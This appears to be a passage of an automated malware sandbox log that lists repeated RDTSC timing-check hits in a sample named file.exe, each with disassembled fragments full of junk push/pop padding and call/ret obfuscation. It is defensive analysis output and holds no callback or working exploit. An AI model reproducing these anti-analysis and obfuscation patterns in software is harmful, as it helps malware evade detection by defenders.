Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC10E second address: BEC112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC27C second address: BEC285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF4E second address: BECF74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jc 00007FE4211E2AC4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF74 second address: BECF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEECDD second address: BEECE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEED7F second address: BEED83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF96B second address: BEF970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF970 second address: BEF981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF981 second address: BEF993 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF993 second address: BEF997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF997 second address: BEF9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE4211E2AB8h 0x0000000c popad 0x0000000d nop 0x0000000e sub dword ptr [ebp+122D3299h], eax 0x00000014 push 00000000h 0x00000016 jmp 00007FE4211E2AC0h 0x0000001b push 00000000h 0x0000001d call 00007FE4211E2ABAh 0x00000022 or di, FD60h 0x00000027 pop edi 0x00000028 push eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF9D7 second address: BEF9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF9DB second address: BEF9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF690 second address: BEF696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF696 second address: BEF6A9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF6A9 second address: BEF6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF6AD second address: BEF6B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF6B3 second address: BEF6B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0244 second address: BF024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF024A second address: BF024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0E7A second address: BF0EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FE4211E2AC1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0EAA second address: BF0EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0EB1 second address: BF0F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FE4211E2AB8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push ebx 0x00000023 pop esi 0x00000024 push 00000000h 0x00000026 sub esi, dword ptr [ebp+122D2A7Fh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FE4211E2AB8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 or esi, dword ptr [ebp+122D35ADh] 0x0000004e mov esi, dword ptr [ebp+122D1A1Bh] 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007FE4211E2AB8h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0F1C second address: BF0F40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FE420CEA006h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE420CEA015h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF199D second address: BF19AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2ABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF19AB second address: BF19E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FE420CEA00Ch 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 movsx edi, di 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D3491h] 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 jnp 00007FE420CEA00Ch 0x00000026 jne 00007FE420CEA006h 0x0000002c push eax 0x0000002d push edx 0x0000002e jnc 00007FE420CEA006h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF19E6 second address: BF1A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4E14 second address: BF4E19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6DBB second address: BF6E3C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE4211E2ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FE4211E2AC8h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FE4211E2AB8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FE4211E2AB8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 stc 0x00000049 push 00000000h 0x0000004b call 00007FE4211E2AC0h 0x00000050 pop edi 0x00000051 xchg eax, esi 0x00000052 push ebx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E3C second address: BF6E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E4B second address: BF6E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E4F second address: BF6E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E55 second address: BF6E5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E37 second address: BF7E4B instructions: 0x00000000 rdtsc 0x00000002 je 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E4B second address: BF7E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E51 second address: BF7E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E55 second address: BF7EC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FE4211E2AB8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 sub bx, B17Dh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FE4211E2AB8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 pushad 0x00000045 mov dword ptr [ebp+1244F9B1h], esi 0x0000004b jnl 00007FE4211E2ABCh 0x00000051 popad 0x00000052 movzx edi, ax 0x00000055 push 00000000h 0x00000057 clc 0x00000058 xchg eax, esi 0x00000059 jc 00007FE4211E2AC4h 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5F55 second address: BF5F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5F5B second address: BF5FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FE4211E2AC3h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FE4211E2AB8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov bx, 389Fh 0x00000036 cld 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e jmp 00007FE4211E2ABFh 0x00000043 mov dword ptr [ebp+122D31FDh], ecx 0x00000049 mov eax, dword ptr [ebp+122D0F5Dh] 0x0000004f push FFFFFFFFh 0x00000051 mov bh, al 0x00000053 nop 0x00000054 pushad 0x00000055 pushad 0x00000056 jc 00007FE4211E2AB6h 0x0000005c pushad 0x0000005d popad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6F62 second address: BF6F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FE420CEA00Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFADFC second address: BFAE86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FE4211E2AC4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FE4211E2AB8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a call 00007FE4211E2ABBh 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FE4211E2AB8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push edi 0x0000004d mov edi, dword ptr [ebp+1247782Fh] 0x00000053 pop ebx 0x00000054 mov di, 14E9h 0x00000058 push 00000000h 0x0000005a mov dword ptr [ebp+122D1AE6h], esi 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7012 second address: BF7018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFAE86 second address: BFAE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7018 second address: BF7028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007FE420CEA00Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9FF3 second address: BFA085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+1244F423h], edx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FE4211E2AB8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FE4211E2AB8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 sub bh, FFFFFFF7h 0x00000054 mov eax, dword ptr [ebp+122D05C5h] 0x0000005a mov edi, dword ptr [ebp+122D32E5h] 0x00000060 push FFFFFFFFh 0x00000062 mov edi, dword ptr [ebp+122D2F56h] 0x00000068 nop 0x00000069 push edi 0x0000006a jmp 00007FE4211E2ABBh 0x0000006f pop edi 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push ecx 0x00000074 jmp 00007FE4211E2ABEh 0x00000079 pop ecx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA085 second address: BFA08B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA08B second address: BFA08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA08F second address: BFA093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFCFFE second address: BFD005 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC08C second address: BFC097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE420CEA006h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC097 second address: BFC09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC09D second address: BFC0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00118 second address: C0012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FE4211E2ABCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0012C second address: C00132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00132 second address: C00136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C010D4 second address: C010D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C010D8 second address: C0113B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FE4211E2AB8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 sbb bx, C31Bh 0x0000001b push 00000000h 0x0000001d cld 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FE4211E2AB8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a call 00007FE4211E2AC6h 0x0000003f pop ebx 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 pop eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00374 second address: C0037E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C032F0 second address: C032F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C032F6 second address: C03340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FE420CEA00Ah 0x00000012 mov edi, edx 0x00000014 push 00000000h 0x00000016 mov edi, 12A76B3Ch 0x0000001b push 00000000h 0x0000001d mov bx, 1688h 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 jc 00007FE420CEA01Eh 0x00000029 jmp 00007FE420CEA018h 0x0000002e push eax 0x0000002f push edx 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C01326 second address: C0134E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE4211E2AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FE4211E2AC7h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04434 second address: C04438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C034FF second address: C03513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FE4211E2AB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04438 second address: C0443E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C03513 second address: C03518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0443E second address: C04443 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C03518 second address: C0351E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C035D6 second address: C035E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE420CEA006h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C605 second address: C0C60A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C79B second address: C0C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA68 second address: C0CA72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA72 second address: C0CA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109A6 second address: C109AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109AA second address: C109C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA013h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109C1 second address: C109EB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4211E2AC1h 0x00000008 jmp 00007FE4211E2ABBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FE4211E2ABAh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109EB second address: C109F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16893 second address: C1689A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1689A second address: C168C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Eh 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FE420CEA00Bh 0x00000010 jbe 00007FE420CEA017h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAAE0C second address: BAAE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAAE12 second address: BAAE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA012h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
